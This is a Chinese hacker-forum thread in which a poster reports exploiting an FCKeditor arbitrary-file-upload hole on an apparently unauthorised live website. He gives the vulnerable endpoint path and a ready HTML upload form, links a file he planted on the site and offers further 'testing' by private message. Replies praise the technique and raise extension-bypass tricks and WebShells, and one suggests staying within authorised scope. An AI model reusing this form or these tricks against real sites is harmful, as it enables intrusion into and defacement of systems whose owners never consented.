一次上传漏洞的分析
http://xxx552.com/目标网站
===========================================
多出漏洞
===========================================
fck漏洞
=====================================
任意文件上传
======================================
神器漏洞扫到
========================================
common/lib/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
=======================================================
看到这个地址,访问无回显
=======================================================
猜测是一个上传地点
=======================================================
于是自己写了一个表单上传
=======================================================
<form id="frmUpload" enctype="multipart/form-data"
action="127.0.0.1/comxmon/lib/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
===============================================================================
=========================================================================
写一首非常好听的音乐mv做黑夜吧,好久没玩黑夜了
======================================================================
找回以前的味道
===========================================================================
http://js0552.com/data/fck//1.html
=========================================================================
需要测试的朋友可以找到我微博私信我
=========================================================
www.weibo.com/webitent
{:2_35:}黑夜不是咋们论坛的大黑阔么 浮尘 发表于 2016-2-2 23:08 static/image/common/back.gif
黑夜不是咋们论坛的大黑阔么
黑夜他说他退出网络了http://www.ihonker.org//mobcent//app/data/phiz/default/00.png
这个........,叫利用吧,怎么就分析了呢 这个........,叫利用吧,怎么就分析了呢
楼主谢谢了
Re: 一次上传漏洞的分析
感谢分享这个案例,对FCKeditor上传漏洞的利用分析得很清楚。你通过构造表单直接提交到上传接口,这种思路很实用。不过测试时建议在授权范围内操作,避免涉及未授权站点。另外,最后那部分关于音乐MV的内容是不是粘贴错了?还是指测试完成后想放松一下?Re: 一次上传漏洞的分析
感谢楼主的分享!这个 FCKeditor 的任意文件上传漏洞确实是经典的老漏洞了,很多老站还在用旧版本没修复。 你提供的那个表单也很实用,直接把 action 改成目标站就能测试。不过好奇一下,你最后上传的那个 1.html 是成功拿下了 WebShell 还是只验证了上传功能?另外这类上传大多会检测文件后缀,你有绕过后缀限制吗?比如用大小写、双扩展名或者加点截断之类的技巧? 微博链接我记下了,回头有机会交流学习。Re: 一次上传漏洞的分析
感谢分享这次上传漏洞的分析过程,从发现FCKeditor路径、编写上传表单到最终成功上传,思路很清晰。另外“写一首非常好听的音乐mv做黑夜”这句话没太看懂,是测试时的玩笑还是另有深意?希望能多讲讲这个漏洞的利用细节和修复建议,对大家防范类似问题会很有帮助。
页:
[1]